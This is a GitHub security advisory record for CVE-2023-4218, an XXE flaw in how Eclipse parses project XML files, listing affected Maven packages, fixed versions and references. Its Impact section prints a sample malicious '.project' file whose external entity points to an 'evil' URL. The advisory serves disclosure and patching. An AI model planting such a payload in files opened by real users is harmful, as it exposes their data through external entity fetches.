{"id":"GHSA-j24h-xcpc-9jw8","summary":"Eclipse IDE XXE in eclipse.platform","details":"### Impact\nxml files like \".project\" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review  a foreign repository or patch).\n\nVulnerablility was found by static code analysis (SonarLint).\n\nExample `.project` file:\n```\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e \n\u003c!DOCTYPE price [\n\u003c!ENTITY xxe SYSTEM \"http://127.0.0.1:49416/evil\"\u003e]\u003e\n\u003cprojectDescription\u003e\n\t\u003cname\u003ep\u003c/name\u003e\n\t\u003ccomment\u003e&xxe;\u003c/comment\u003e\n\u003c/projectDescription\u003e\n```\n\n### Patches\nSimilar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any `DOCTYPE`.\n\n### Workarounds\nNo known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).\n\n### References\nhttps://cwe.mitre.org/data/definitions/611.html\nhttps://rules.sonarsource.com/java/RSPEC-2755\nhttps://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)\n\n","aliases":["CVE-2023-4218"],"modified":"2024-12-03T05:26:16.934905Z","published":"2023-11-30T19:52:54Z","database_specific":{"cwe_ids":[],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2023-11-30T19:52:54Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform/security/advisories/GHSA-j24h-xcpc-9jw8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4218"},{"type":"WEB","url":"https://github.com/eclipse-emf/org.eclipse.emf/issues/10"},{"type":"WEB","url":"https://github.com/eclipse-pde/eclipse.pde/pull/632"},{"type":"WEB","url":"https://github.com/eclipse-pde/eclipse.pde/pull/667"},{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform.releng.buildtools/pull/45"},{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform/pull/761"},{"type":"WEB","url":"https://github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b"},{"type":"WEB","url":"https://github.com/eclipse-jdt/eclipse.jdt.core/commit/38dd2a878f45cdb3d8d52090f1d6d1b532fd4c4d"},{"type":"WEB","url":"https://github.com/eclipse-jdt/eclipse.jdt.ui/commit/13675b1f8a74f47de4da89ed0ded6af7c21dfbec"},{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform.swt/commit/bf71db5ddcb967c0863dad4745367b54f49e06ba"},{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform.ui/commit/f243cf0a28785b89b7c50bf4e1cce48a917d89bd"},{"type":"WEB","url":"https://github.com/eclipse-platform/eclipse.platform/commit/5dc372a0c5002b7f22e5d49eaa1cbf0916455daf"},{"type":"PACKAGE","url":"https://github.com/eclipse-platform/eclipse.platform"},{"type":"WEB","url":"https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8"}],"affected":[{"package":{"name":"org.eclipse.platform:org.eclipse.core.runtime","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.core.runtime"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.29.0"}]}],"versions":["3.12.0","3.13.0","3.14.0","3.15.0","3.15.100","3.15.200","3.15.300","3.16.0","3.17.0","3.17.100","3.18.0","3.19.0","3.20.0","3.20.100","3.22.0","3.23.0","3.24.0","3.24.100","3.25.0","3.26.0","3.26.100","3.27.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.platform","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.platform"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.29.0"}]}],"versions":["4.10.0","4.11.0","4.12.0","4.13.0","4.14.0","4.15.0","4.16.0","4.17.0","4.18.0","4.19.0","4.20.0","4.21.0","4.22.0","4.23.0","4.24.0","4.25.0","4.26.0","4.27.0","4.28.0","4.6.2","4.6.3","4.7.0","4.7.1","4.7.2","4.7.3","4.8.0","4.9.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.jface","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.jface"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.31.0"}]}],"versions":["3.12.1","3.12.2","3.13.0","3.13.1","3.13.2","3.14.0","3.14.100","3.15.0","3.15.100","3.16.0","3.17.0","3.18.0","3.19.0","3.20.0","3.21.0","3.22.0","3.22.100","3.22.200","3.23.0","3.24.0","3.25.0","3.26.0","3.27.0","3.28.0","3.29.0","3.30.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.ui.forms","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.ui.forms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.13.0"}]}],"versions":["3.10.0","3.11.0","3.11.100","3.11.200","3.11.300","3.11.400","3.11.500","3.11.600","3.12.0","3.7.0","3.7.1","3.7.100","3.7.101","3.7.200","3.7.300","3.7.400","3.7.500","3.8.0","3.8.100","3.8.200","3.9.0","3.9.100"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.ui.ide","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.ui.ide"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.21.100"}]}],"versions":["3.12.2","3.12.3","3.13.0","3.13.1","3.14.0","3.14.100","3.14.200","3.15.0","3.15.200","3.16.0","3.16.100","3.17.0","3.17.100","3.17.200","3.18.0","3.18.100","3.18.200","3.18.300","3.18.400","3.18.500","3.19.0","3.19.100","3.20.0","3.20.100","3.21.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.ui.workbench","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.ui.workbench"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.130.0"}]}],"versions":["3.108.2","3.108.3","3.110.0","3.110.1","3.111.0","3.112.0","3.112.100","3.113.0","3.115.0","3.116.0","3.117.0","3.118.0","3.119.0","3.120.0","3.122.0","3.122.100","3.122.200","3.123.0","3.124.0","3.125.0","3.125.100","3.126.0","3.127.0","3.128.0","3.129.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.platform:org.eclipse.urischeme","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.platform/org.eclipse.urischeme"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.3.100"}]}],"versions":["1.0.0","1.0.100","1.0.200","1.0.300","1.0.400","1.0.500","1.0.600","1.1.0","1.1.100","1.1.200","1.1.300","1.1.400","1.2.0","1.2.100","1.2.200","1.2.300","1.3.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}},{"package":{"name":"org.eclipse.jdt:org.eclipse.jdt.ui","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jdt/org.eclipse.jdt.ui"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.30.0"}]}],"versions":["3.12.2","3.13.0","3.13.100","3.13.50","3.13.51","3.13.52","3.14.0","3.15.0","3.16.0","3.17.0","3.18.0","3.19.0","3.20.0","3.21.0","3.21.100","3.21.200","3.22.0","3.22.100","3.23.0","3.24.0","3.25.0","3.26.0","3.26.100","3.27.0","3.27.100","3.28.0","3.29.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"}]}